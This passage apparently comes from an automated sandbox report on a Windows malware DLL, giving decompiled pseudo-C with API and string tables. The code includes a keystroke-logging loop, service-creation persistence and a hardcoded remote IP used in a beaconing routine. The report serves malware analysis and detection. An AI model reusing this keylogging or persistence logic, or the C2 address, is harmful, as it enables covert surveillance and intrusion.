								E10008182(_t111 - 0x1180);
							} else {
								goto L13;
							}
						} else {
							E10001B2C(_t111 - 0x6c);
							 *((char*)(_t111 - 0xd)) = 1;
							L13:
							 *(_t111 - 4) = 0;
							E10008182(_t111 - 0x1180);
							goto L5;
						}
					}
				} else {
					L9:
					 *((char*)(_t111 - 0xd)) = 1;
					goto L5;
				}
				L20:
				 *(_t111 - 4) =  *(_t111 - 4) | 0xffffffff;
				E100016A7(_t111 - 0x6c);
				__eflags = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0xc));
				return 0;
				L18:
				E10001B2C(_t111 - 0x6c);
				goto L20;
			}

0x1000b281
0x1000b286
0x1000b290
0x1000b297
0x1000b2a5
0x1000b2c3
0x1000b2c9
0x1000b2db
0x1000b2df
0x1000b2e1
0x1000b2e7
0x1000b2ec
0x1000b2ef
0x1000b2f6
0x1000b2fd
0x1000b2fd
0x1000b2ec
0x1000b2df
0x1000b309
0x1000b31b
0x1000b324
0x1000b329
0x1000b32c
0x00000000
0x1000b32f
0x1000b332
0x1000b339
0x1000b339
0x1000b33f
0x1000b345
0x00000000
0x00000000
0x1000b34f
0x1000b356
0x1000b361
0x1000b361
0x1000b363
0x1000b365
0x1000b366
0x1000b373
0x1000b38f
0x1000b39d
0x1000b3b0
0x1000b3b2
0x00000000
0x1000b3b4
0x1000b3b4
0x1000b3d1
0x1000b3e0
0x1000b3e4
0x1000b3ee
0x1000b3f4
0x1000b3f7
0x1000b418
0x1000b41d
0x1000b42a
0x1000b430
0x1000b435
0x1000b437
0x00000000
0x00000000
0x1000b439
0x1000b43b
0x00000000
0x00000000
0x00000000
0x1000b43b
0x1000b43d
0x1000b43f
0x1000b450
0x1000b45b
0x1000b45e
0x1000b441
0x00000000
0x1000b441
0x1000b3f9
0x1000b3fc
0x1000b401
0x1000b405
0x1000b40b
0x1000b40e
0x00000000
0x1000b40e
0x1000b3f7
0x1000b391
0x1000b391
0x1000b391
0x00000000
0x1000b391
0x1000b463
0x1000b463
0x1000b46a
0x1000b474
0x1000b477
0x1000b47f
0x1000b443
0x1000b446
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1000B286

Part of subcall function 10002D28: strcpy.MSVCRT(?,SYSTEM\CurrentControlSet\Services), ref: 10002D3D
Part of subcall function 10002D28: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 10002D5B
Part of subcall function 10002D28: #823.MFC42(00000050), ref: 10002D63
Part of subcall function 10002D28: RegQueryValueExA.ADVAPI32(?,Group,00000000,00000001,00000000,?), ref: 10002D8A

wsprintfA.USER32 ref: 1000B2C3
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 1000B2D5
GetLastError.KERNEL32 ref: 1000B2E1
ReleaseMutex.KERNEL32(00000000), ref: 1000B2EF
CloseHandle.KERNEL32(00000000), ref: 1000B2F6
ExitProcess.KERNEL32 ref: 1000B2FD
SetUnhandledExceptionFilter.KERNEL32(1000B225), ref: 1000B309
GetCurrentThread.KERNEL32 ref: 1000B314
SetThreadPriority.KERNEL32(00000000), ref: 1000B31B
Sleep.KERNEL32(00001770), ref: 1000B339
lstrcatA.KERNEL32(?,103.119.44.216), ref: 1000B373
strcmp.MSVCRT ref: 1000B385
GetTickCount.KERNEL32 ref: 1000B397
GetTickCount.KERNEL32 ref: 1000B3B4
WaitForSingleObject.KERNEL32(?,00000064,?,?,?,00001F91), ref: 1000B41D
Sleep.KERNEL32(000001F4), ref: 1000B42A

Strings

103.119.44.216, xrefs: 1000B2B8, 1000B35C
%s:%d:%s, xrefs: 1000B2BD
Vwxyab Defghijk, xrefs: 1000B2A7

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: CountMutexSleepThreadTick$#823CloseCreateCurrentErrorExceptionExitFilterH_prologHandleLastObjectOpenPriorityProcessQueryReleaseSingleUnhandledValueWaitlstrcatstrcmpstrcpywsprintf
String ID: %s:%d:%s$103.119.44.216$Vwxyab Defghijk
API String ID: 2472078914-4123104689
Opcode ID: cce73fdb6edebe78431b58c567a8ba652eb3402336b0f2522d5561a243016234
Instruction ID: d6cc6d2f6414ab50af1aff5515a947e5e4ab38da778d296dd5f02e8ff2da67b2
Opcode Fuzzy Hash: cce73fdb6edebe78431b58c567a8ba652eb3402336b0f2522d5561a243016234
Instruction Fuzzy Hash: 0E518C32800569EFEB10DFA4CC89ADEBBB8FF05380F6440A9F609A7055DB345B49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100060EF, Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 79
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E100060EF() {
				void* _t47;
				void* _t69;

				E100158AC(E1001A336, _t69);
				_push( *((intOrPtr*)(_t69 + 8)));
				L1001585A();
				_push("\\");
				 *(_t69 - 4) = 0;
				L10015854();
				_push(1);
				_push(_t69 - 0x18);
				 *(_t69 - 4) = 1;
				L1001584E();
				 *(_t69 - 4) = 2;
				 *((char*)(_t69 + 0xb)) = E10008686(_t69 - 0x18, _t69 - 0x14);
				 *(_t69 - 4) = 1;
				L1001580C();
				 *(_t69 - 4) = 0;
				L1001580C();
				if( *((intOrPtr*)(_t69 + 0xb)) != 0) {
					_push("\\");
					L10015854();
					_push(_t69 + 8);
					 *(_t69 - 4) = 3;
					L10015848();
					 *(_t69 - 4) = 0;
					L1001580C();
				}
				_push(L"*.*");
				L10015854();
				_push(_t69 + 8);
				 *(_t69 - 4) = 4;
				L10015848();
				 *(_t69 - 4) = 0;
				L1001580C();
				_t47 = FindFirstFileA(E1000865D(_t69 - 0x10), _t69 - 0x158);
				if(_t47 == 0xffffffff || ( *(_t69 - 0x158) & 0x00000010) == 0) {
					if(( *(_t69 - 0x158) & 0x00000020) != 0) {
						goto L5;
					}
				} else {
					L5:
					_push(1);
					_pop(0);
				}
				FindClose(_t47);
				 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
				L1001580C();
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return 0;
			}

0x100060f4
0x10006103
0x10006106
0x1000610d
0x10006115
0x10006118
0x10006120
0x10006122
0x10006126
0x1000612a
0x10006132
0x10006140
0x10006143
0x10006147
0x1000614f
0x10006152
0x1000615a
0x1000615c
0x10006164
0x1000616f
0x10006170
0x10006174
0x1000617c
0x1000617f
0x1000617f
0x10006184
0x1000618c
0x10006197
0x10006198
0x1000619c
0x100061a4
0x100061a7
0x100061bc
0x100061c5
0x100061d7
0x00000000
0x00000000
0x100061d9
0x100061d9
0x100061d9
0x100061db
0x100061db
0x100061dd
0x100061e3
0x100061ea
0x100061f5
0x100061fd

APIs

__EH_prolog.LIBCMT ref: 100060F4
#535.MFC42(?,00000000), ref: 10006106
#539.MFC42(100243F4,?,00000000), ref: 10006118
#5710.MFC42(?,00000001,100243F4,?,00000000), ref: 1000612A
#800.MFC42(00000000,?,?,00000001,100243F4,?,00000000), ref: 10006147
#800.MFC42(00000000,?,?,00000001,100243F4,?,00000000), ref: 10006152
#539.MFC42(100243F8,00000000,?,?,00000001,100243F4,?,00000000), ref: 10006164
#939.MFC42(?,100243F8,00000000,?,?,00000001,100243F4,?,00000000), ref: 10006174
#800.MFC42(?,100243F8,00000000,?,?,00000001,100243F4,?,00000000), ref: 1000617F
#539.MFC42(*.*,00000000,?,?,00000001,100243F4,?,00000000), ref: 1000618C
#939.MFC42(?,*.*,00000000,?,?,00000001,100243F4,?,00000000), ref: 1000619C
#800.MFC42(?,*.*,00000000,?,?,00000001,100243F4,?,00000000), ref: 100061A7
FindFirstFileA.KERNEL32(00000000,?,?,*.*,00000000,?,?,00000001,100243F4,?,00000000), ref: 100061BC
FindClose.KERNEL32(00000000), ref: 100061DD
#800.MFC42 ref: 100061EA

Strings

, xrefs: 100061D0
*.*, xrefs: 10006184

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: #800$#539$#939Find$#535#5710CloseFileFirstH_prolog
String ID: $*.*
API String ID: 3327415277-3453346748
Opcode ID: fd790b8f538bc5a768690af123debe82f25aee32bc8cde03088ad3539998871f
Instruction ID: eb3e061433a6590b729ee39e0ae11a692ef713a2f0f42b06ac14a4d430de1b18
Opcode Fuzzy Hash: fd790b8f538bc5a768690af123debe82f25aee32bc8cde03088ad3539998871f
Instruction Fuzzy Hash: 8C31AA34800289EEEB00DBA0C895AEDBBB4EF14340F584088F8557B1D2DF35AB8CCB20

Uniqueness

Uniqueness Score: -1.00%

Function 10002FC4, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 178
serviceCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E10002FC4(char* _a4, char* _a8, CHAR* _a12, char* _a16, char* _a20, signed int _a24, int _a28) {
				int _v8;
				char _v20;
				int _v32;
				int _v36;
				void* _v40;
				char _v300;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				int _v344;
				int _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				char _v364;
				char* _v368;
				intOrPtr _v372;
				int _v376;
				int _v380;
				char _v384;
				void* __ebx;
				void* __ebp;
				void* _t88;
				signed int _t100;
				void* _t108;
				signed int _t110;
				int _t123;
				intOrPtr _t128;

				_push(0xffffffff);
				_push(0x1001b440);
				_push(0x10015a2a);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t128;
				_v32 = 0;
				_v40 = 0;
				_v36 = 0;
				_v8 = 0;
				_t88 = OpenSCManagerA(0, 0, 0xf003f);
				_v36 = _t88;
				if(_t88 != 0) {
					asm("sbb ecx, ecx");
					_v40 = CreateServiceA(_t88, _a4, _a8, 0xf01ff, ( ~_a24 & 0x0000fef1) + 0x110, _a28, 0, _a16, 0, 0, _a20, 0, 0);
					_v384 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t123 = 1;
					 *0x10027350(_v40, _t123,  &_v384);
					_v380 = 0;
					_v384 = 0;
					_v360 = 0x1388;
					_v364 = _t123;
					_v352 = 0;
					_v356 = _t123;
					_v344 = 0;
					_v348 = _t123;
					_v372 = 3;
					_v368 =  &_v364;
					_v376 = 0;
					 *0x10027350(_v40, 2,  &_v384);
					 *0x10027350(_v40, _t123,  &_v384);
					if(_v40 != 0 || GetLastError() != 0x431) {
						L6:
						if(StartServiceA(_v40, 0, 0) != 0) {
							_v340 = 0x53;
							_v339 = 0x59;
							_v338 = 0x53;
							_v337 = 0x54;
							_v336 = 0x45;
							_v335 = 0x4d;
							_v334 = 0x5c;
							_v333 = 0x43;
							_v332 = 0x75;
							_v331 = 0x72;
							_v330 = 0x72;
							_v329 = 0x65;
							_v328 = 0x6e;
							_v327 = 0x74;
							_v326 = 0x43;
							_v325 = 0x6f;
							_v324 = 0x6e;
							_v323 = 0x74;
							_v322 = 0x72;
							_v321 = 0x6f;
							_v320 = 0x6c;
							_v319 = 0x53;
							_v318 = 0x65;
							_v317 = 0x74;
							_v316 = 0x5c;
							_v315 = 0x53;
							_v314 = 0x65;
							_v313 = 0x72;
							_v312 = 0x76;
							_v311 = 0x69;
							_v310 = 0x63;
							_v309 = 0x65;
							_v308 = 0x73;
							_v307 = 0x5c;
							_v306 = 0x25;
							_v305 = 0x73;
							_v304 = 0;
							_t77 =  &_v340; // 0x53
							wsprintfA( &_v300, _t77, _a4);
							E1000D502(0x80000002,  &_v300, "Description", _t123, _a12, lstrlenA(_a12), 0);
							_v32 = _t123;
						}
						goto L8;
					} else {
						_t108 = OpenServiceA(_v36, _a4, 0xf01ff);
						_v40 = _t108;
						if(_t108 == 0) {
							L8:
							_v8 = _v8 | 0xffffffff;
							E1000329B(0);
							_t100 = _v32;
							L9:
							 *[fs:0x0] = _v20;
							return _t100;
						}
						StartServiceA(_t108, 0, 0);
						goto L6;
					}
				}
				_push(0xffffffff);
				_t110 =  &_v20;
				_push(_t110);
				L10015A30();
				_t100 = _t110 | 0xffffffff;
				goto L9;
			}

0x10002fc7
0x10002fc9
0x10002fce
0x10002fd9
0x10002fda
0x10002fec
0x10002fef
0x10002ff2
0x10002ff5
0x10002fff
0x10003005
0x1000300a
0x10003034
0x10003055
0x10003058
0x10003066
0x10003067
0x10003068
0x10003069
0x10003073
0x10003078
0x1000307e
0x10003084
0x1000308a
0x10003094
0x1000309a
0x100030a0
0x100030a6
0x100030ac
0x100030b2
0x100030c2
0x100030c8
0x100030da
0x100030eb
0x100030f4
0x10003124
0x10003131
0x10003137
0x1000313e
0x10003145
0x1000314c
0x10003153
0x1000315a
0x10003161
0x10003168
0x1000316f
0x10003176
0x1000317d
0x10003184
0x1000318b
0x10003192
0x10003199
0x100031a0
0x100031a7
0x100031ae
0x100031b5
0x100031bc
0x100031c3
0x100031ca
0x100031d1
0x100031d8
0x100031df
0x100031e6
0x100031ed
0x100031f4
0x100031fb
0x10003202
0x10003209
0x10003210
0x10003217
0x1000321e
0x10003225
0x1000322c
0x10003233
0x1000323c
0x1000324a
0x10003273
0x1000327b
0x1000327b
0x00000000
0x10003103
0x1000310a
0x10003110
0x10003115
0x1000327e
0x1000327e
0x10003282
0x10003287
0x1000328a
0x1000328d
0x10003298
0x10003298
0x1000311e
0x00000000
0x1000311e
0x100030f4
0x1000300c
0x1000300e
0x10003011
0x10003012
0x10003019
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000104,%SystemRoot%\,00000000), ref: 10002FFF
_local_unwind2.MSVCRT ref: 10003012
CreateServiceA.ADVAPI32(00000000,00000000,00000000,000F01FF,?,1000BA46,00000000,?,00000000,00000000,?,00000000,00000000), ref: 1000304F
ChangeServiceConfig2A.ADVAPI32(?,00000001,?), ref: 10003078
ChangeServiceConfig2A.ADVAPI32(?,00000002,?), ref: 100030DA
ChangeServiceConfig2A.ADVAPI32(?,00000001,?), ref: 100030EB
GetLastError.KERNEL32 ref: 100030F6
OpenServiceA.ADVAPI32(1000BA46,00000000,000F01FF), ref: 1000310A
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 1000311E
StartServiceA.ADVAPI32(?,00000000,00000000), ref: 10003129

Strings

Description, xrefs: 10003262
SYSTEM\CurrentControlSet\Services\%s, xrefs: 1000323C, 10003242
%SystemRoot%\, xrefs: 10002FE8

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Service$ChangeConfig2$OpenStart$CreateErrorLastManager_local_unwind2
String ID: %SystemRoot%\$Description$SYSTEM\CurrentControlSet\Services\%s
API String ID: 1788442178-1976205218
Opcode ID: 307fcf97ac6061218fc162683cf5d3b5bbc847212bf9732513390dec2a92e177
Instruction ID: f0582a4fd015962c8768af1bed56dba013eff37cc8f6c07f9e5717c3f57d1c77
Opcode Fuzzy Hash: 307fcf97ac6061218fc162683cf5d3b5bbc847212bf9732513390dec2a92e177
Instruction Fuzzy Hash: 2C812E70C086A8DEEB21CB64CC88BDEBFB8AB19344F0441D9E55C66291C77A4F94CF61

Uniqueness

Uniqueness Score: -1.00%

Function 10004247, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 157
keyboardsleepstringCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E10004247() {
				int _v8;
				void _v607;
				char _v608;
				void _v1628;
				int _v1632;
				signed int* _t63;
				signed int _t96;
				signed int _t97;
				short _t102;
				signed int _t103;
				int _t104;
				int _t105;
				void* _t106;
				void* _t107;
				void* _t110;
				void* _t111;

				_t104 = 0;
				_t111 =  *0x100239d4 - _t104; // 0x1
				if(_t111 != 0) {
					_v608 = _v608 & 0;
					_v1632 = 0;
					memset( &_v607, memset( &_v1628, 0, 0xff << 2), 0x95 << 2);
					asm("stosw");
					asm("stosb");
					 *0x100239d4 = 0;
					memset( &_v608, 0, 0x258);
					_t110 = _t107 + 0x24;
					while(1) {
						Sleep(0xa);
						if(lstrlenA( &_v608) != 0) {
							if(E1000415A() == 0) {
								E10004029( &_v608);
								memset( &_v608, _t104, 0x258);
								_t110 = _t110 + 0x10;
							} else {
								E10004029(0x10023f2c);
								E10004029( &_v608);
								memset( &_v608, _t104, 0x258);
								_t110 = _t110 + 0x14;
							}
						}
						_v8 = _t104;
						do {
							_t102 = GetKeyState(0x10);
							_t105 =  *(_v8 + 0x10023840);
							if((GetAsyncKeyState(_t105) & 0x00000080) == 0) {
								_t103 =  *(_t106 + _t105 * 4 - 0x65c);
								_t63 = _t106 + _t105 * 4 - 0x65c;
								if(_t103 == 0) {
									goto L35;
								}
								 *_t63 =  *_t63 & 0x00000000;
								if(_t105 != 8) {
									if(lstrlenA( &_v608) > 0x226) {
										L29:
										E10004029( &_v608);
										memset( &_v608, 0, 0x258);
										_t110 = _t110 + 0x10;
										goto L35;
									}
									if(_t105 != 0xd) {
										asm("cdq");
										_t96 = 2;
										_t97 = _t103 % _t96;
										if(_t97 != 1) {
											if(_t97 != 0) {
												goto L35;
											}
											_push( *((intOrPtr*)(_v8 + 0x10023518)));
											L34:
											lstrcatA( &_v608, ??);
											goto L35;
										}
										_push( *((intOrPtr*)(_v8 + 0x100236ac)));
										goto L34;
									}
									_push("<Enter>\r\n");
									L28:
									lstrcatA( &_v608, ??);
									goto L29;
								}
								_push("<BackSpace>");
								goto L28;
							}
							if(GetKeyState(0x14) == 0 || _t102 <= 0xffffffff || _t105 <= 0x40 || _t105 >= 0x5d) {
								if(GetKeyState(0x14) == 0) {
									L19:
									if(_t102 >= 0) {
										L21:
										 *(_t106 + _t105 * 4 - 0x65c) = 4;
										goto L35;
									}
									 *(_t106 + _t105 * 4 - 0x65c) = 3;
									goto L35;
								}
								if(_t102 >= 0) {
									goto L21;
								}
								if(_t105 <= 0x40 || _t105 >= 0x5d) {
									goto L19;
								} else {
									 *(_t106 + _t105 * 4 - 0x65c) = 2;
									goto L35;
								}
							} else {
								 *(_t106 + _t105 * 4 - 0x65c) = 1;
							}
							L35:
							_v8 = _v8 + 4;
						} while (_v8 < 0x194);
						_t104 = 0;
					}
				}
				return 0;
			}

0x10004252
0x10004255
0x1000425b
0x1000426d
0x10004279
0x10004291
0x10004293
0x10004295
0x1000429f
0x100042a5
0x100042ab
0x100042ae
0x100042b0
0x100042c5
0x100042ce
0x10004301
0x1000430f
0x10004315
0x100042d0
0x100042d5
0x100042e1
0x100042ef
0x100042f5
0x100042f5
0x100042ce
0x10004318
0x1000431b
0x10004323
0x10004329
0x10004339
0x100043b6
0x100043bd
0x100043c6
0x00000000
0x00000000
0x100043cc
0x100043d2
0x100043ed
0x10004406
0x1000440d
0x1000441c
0x10004422
0x00000000
0x10004422
0x100043f2
0x1000442b
0x1000442c
0x1000442d
0x10004432
0x10004441
0x00000000
0x00000000
0x10004446
0x1000444c
0x10004453
0x00000000
0x10004453
0x10004437
0x00000000
0x10004437
0x100043f4
0x100043f9
0x10004400
0x00000000
0x10004400
0x100043d4
0x00000000
0x100043d4
0x10004346
0x10004372
0x10004392
0x10004394
0x100043a6
0x100043a6
0x00000000
0x100043a6
0x10004396
0x00000000
0x10004396
0x10004376
0x00000000
0x00000000
0x1000437b
0x00000000
0x10004382
0x10004382
0x00000000
0x10004382
0x10004357
0x10004357
0x10004357
0x10004459
0x10004459
0x1000445d
0x1000446a
0x1000446a
0x100042ae
0x10004263

APIs

memset.MSVCRT ref: 100042A5
Sleep.KERNEL32(0000000A), ref: 100042B0
lstrlenA.KERNEL32(?), ref: 100042BD
memset.MSVCRT ref: 100042EF
memset.MSVCRT ref: 1000430F
GetKeyState.USER32(00000010), ref: 1000431D
GetAsyncKeyState.USER32(?), ref: 10004330
GetKeyState.USER32(00000014), ref: 1000433D
GetKeyState.USER32(00000014), ref: 10004369

Strings

<Enter>, xrefs: 100043F4
<BackSpace>, xrefs: 100043D4

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: State$memset$AsyncSleeplstrlen
String ID: <BackSpace>$<Enter>
API String ID: 2124264721-3792472884
Opcode ID: 57c80f05ff400e579a5842eaabc6c021773ef64eee5cee42e3fb4faac864c912
Instruction ID: 6a4e26ce8f0352054f610aab736eb3b95eaec6cc22162a31e3e3264afd17e586
Opcode Fuzzy Hash: 57c80f05ff400e579a5842eaabc6c021773ef64eee5cee42e3fb4faac864c912
Instruction Fuzzy Hash: 4451E6F1900B28EFFB20DB94CC48B8E77B9EB84391F1380A1EA15A3155DB30DB458B59

Uniqueness

Uniqueness Score: -1.00%

Function 100109FE, Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 364
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E100109FE(intOrPtr* __ecx, void* __edx, intOrPtr _a4, void* _a8, signed int _a11) {
				signed int _v5;
				signed char _v10;
				char _v11;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _v24;
				struct _FILETIME _v32;
				struct _FILETIME _v40;
				char _v44;
				signed int _v72;
				intOrPtr _v96;
				intOrPtr _v100;
				unsigned int _v108;
				unsigned int _v124;
				char _v384;
				char _v644;
				intOrPtr _t132;
				signed int _t140;
				char _t142;
				void* _t144;
				signed int _t150;
				signed int _t151;
				signed char _t156;
				long _t173;
				signed int _t182;
				signed char _t185;
				signed char* _t190;
				signed char* _t194;
				intOrPtr* _t204;
				signed int _t207;
				signed int _t208;
				signed int _t210;
				signed int _t212;
				signed char _t230;
				signed int _t234;
				signed char _t238;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				intOrPtr _t273;
				char* _t274;
				signed int _t276;
				signed int _t277;
				void* _t278;
				intOrPtr* _t280;
				void* _t281;

				_t213 = __ecx;
				_t273 = _a4;
				_t208 = _t207 | 0xffffffff;
				_t280 = __ecx;
				_v24 = __ecx;
				if(_t273 < _t208) {
					L61:
					return 0x10000;
				}
				_t131 =  *__ecx;
				if(_t273 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L61;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t208) {
					E100107A2(_t131);
					_pop(_t213);
				}
				 *(_t280 + 4) = _t208;
				if(_t273 !=  *((intOrPtr*)(_t280 + 0x134))) {
					__eflags = _t273 - _t208;
					if(_t273 != _t208) {
						_t132 =  *_t280;
						__eflags = _t273 -  *((intOrPtr*)(_t132 + 0x10));
						if(_t273 >=  *((intOrPtr*)(_t132 + 0x10))) {
							L12:
							_t133 =  *_t280;
							__eflags =  *( *_t280 + 0x10) - _t273;
							if(__eflags >= 0) {
								E1001007A( *_t280,  &_v124,  &_v384, 0x104, 0, 0, 0, 0);
								_t140 = E100101D0(__eflags,  *_t280,  &_v44,  &_v20,  &_v16);
								__eflags = _t140;
								if(_t140 == 0) {
									_t142 = E1000F840( *((intOrPtr*)( *_t280)), _v20, 0);
									__eflags = _t142;
									if(_t142 != 0) {
										L19:
										return 0x800;
									}
									_push(_v16);
									L10015806();
									_v12 = _t142;
									_t144 = E1000F8BC(_t142, 1, _v16,  *((intOrPtr*)( *_t280)));
									__eflags = _t144 - _v16;
									if(_t144 == _v16) {
										_t281 = _a8;
										 *_t281 =  *( *_t280 + 0x10);
										strcpy( &_v644,  &_v384);
										_t274 =  &_v644;
										while(1) {
											_t150 =  *_t274;
											__eflags = _t150;
											if(_t150 == 0) {
												break;
											}
											L22:
											__eflags = _t274[1] - 0x3a;
											if(_t274[1] != 0x3a) {
												goto L24;
											}
											_t274 =  &(_t274[2]);
											while(1) {
												_t150 =  *_t274;
												__eflags = _t150;
												if(_t150 == 0) {
													break;
												}
												goto L22;
											}
											L24:
											__eflags = _t150 - 0x5c;
											if(_t150 == 0x5c) {
												L26:
												_t274 =  &(_t274[1]);
												while(1) {
													_t150 =  *_t274;
													__eflags = _t150;
													if(_t150 == 0) {
														break;
													}
													goto L22;
												}
												goto L24;
											}
											__eflags = _t150 - 0x2f;
											if(_t150 != 0x2f) {
												_t151 = E10011761(_t150, _t274, "\\..\\");
												__eflags = _t151;
												if(_t151 != 0) {
													L31:
													_t39 = _t151 + 4; // 0x4
													_t274 = _t39;
													continue;
												}
												_t151 = E10011761(_t151, _t274, "\\../");
												__eflags = _t151;
												if(_t151 != 0) {
													goto L31;
												}
												_t151 = E10011761(_t151, _t274, "/../");
												__eflags = _t151;
												if(_t151 != 0) {
													goto L31;
												}
												_t151 = E10011761(_t151, _t274, "/..\\");
												__eflags = _t151;
												if(_t151 == 0) {
													strcpy(_t281 + 4, _t274);
													_t265 = _v72;
													_a11 = _a11 & 0x00000000;
													_v5 = _v5 & 0x00000000;
													_t156 = _t265 >> 0x0000001e & 0x00000001;
													_t230 =  !(_t265 >> 0x17) & 0x00000001;
													_t276 = _v124 >> 8;
													__eflags = _t276;
													_t210 = 1;
													if(_t276 == 0) {
														L36:
														_a11 = _t265 >> 0x00000001 & 0x00000001;
														_t230 = _t265 & 0x00000001;
														_v5 = _t265 >> 0x00000002 & 0x00000001;
														_t156 = _t265 >> 0x00000004 & 0x00000001;
														_t265 = _t265 >> 0x00000005 & 0x00000001;
														__eflags = _t265;
														_t210 = _t265;
														L37:
														_t277 = 0;
														__eflags = _t156;
														 *(_t281 + 0x108) = 0;
														if(_t156 != 0) {
															 *(_t281 + 0x108) = 0x10;
														}
														__eflags = _t210;
														if(_t210 != 0) {
															_t51 = _t281 + 0x108;
															 *_t51 =  *(_t281 + 0x108) | 0x00000020;
															__eflags =  *_t51;
														}
														__eflags = _a11;
														if(_a11 != 0) {
															_t54 = _t281 + 0x108;
															 *_t54 =  *(_t281 + 0x108) | 0x00000002;
															__eflags =  *_t54;
														}
														__eflags = _t230;
														if(_t230 != 0) {
															_t56 = _t281 + 0x108;
															 *_t56 =  *(_t281 + 0x108) | 0x00000001;
															__eflags =  *_t56;
														}
														__eflags = _v5;
														if(_v5 != 0) {
															_t59 = _t281 + 0x108;
															 *_t59 =  *(_t281 + 0x108) | 0x00000004;
															__eflags =  *_t59;
														}
														 *((intOrPtr*)(_t281 + 0x124)) = _v100;
														 *((intOrPtr*)(_t281 + 0x128)) = _v96;
														_v40.dwLowDateTime = E1001089E(_v108 >> 0x10, _v108);
														_v40.dwHighDateTime = _t265;
														LocalFileTimeToFileTime( &_v40,  &_v32);
														_t173 = _v32.dwLowDateTime;
														_t234 = _v32.dwHighDateTime;
														__eflags = _v16 - 4;
														_t212 = _v12;
														 *(_t281 + 0x10c) = _t173;
														 *(_t281 + 0x114) = _t173;
														 *(_t281 + 0x11c) = _t173;
														 *(_t281 + 0x110) = _t234;
														 *(_t281 + 0x118) = _t234;
														 *(_t281 + 0x120) = _t234;
														if(_v16 <= 4) {
															L57:
															__eflags = _t212;
															if(_t212 != 0) {
																_push(_t212);
																L10015800();
															}
															_t127 = _v24 + 8; // 0x8
															memcpy(_t127, _t281, 0x12c);
															 *((intOrPtr*)(_v24 + 0x134)) = _a4;
															goto L60;
														} else {
															while(1) {
																_v12 =  *((intOrPtr*)(_t277 + _t212));
																_v10 = _v10 & 0x00000000;
																_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
																_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
																_t182 = strcmp( &_v12, "UT");
																__eflags = _t182;
																if(_t182 == 0) {
																	break;
																}
																_t277 = _t277 + _a8 + 4;
																__eflags = _t277 + 4 - _v16;
																if(_t277 + 4 < _v16) {
																	continue;
																}
																goto L57;
															}
															_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
															_t185 = _t238 >> 0x00000001 & 0x00000001;
															_t278 = _t277 + 5;
															_a11 = _t185;
															__eflags = _t238 & 0x00000001;
															_v5 = _t238 >> 0x00000002 & 0x00000001;
															if((_t238 & 0x00000001) != 0) {
																_t272 =  *(_t278 + _t212 + 1) & 0x000000ff;
																_t194 = _t278 + _t212;
																_t278 = _t278 + 4;
																__eflags =  *_t194 & 0x000000ff | (0 << 0x00000008 | _t272) << 0x00000008;
																 *(_t281 + 0x11c) = E1001087A(_t272,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t272) << 0x00000008);
																_t185 = _a11;
																 *(_t281 + 0x120) = _t272;
															}
															__eflags = _t185;
															if(_t185 != 0) {
																_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
																_t190 = _t278 + _t212;
																_t278 = _t278 + 4;
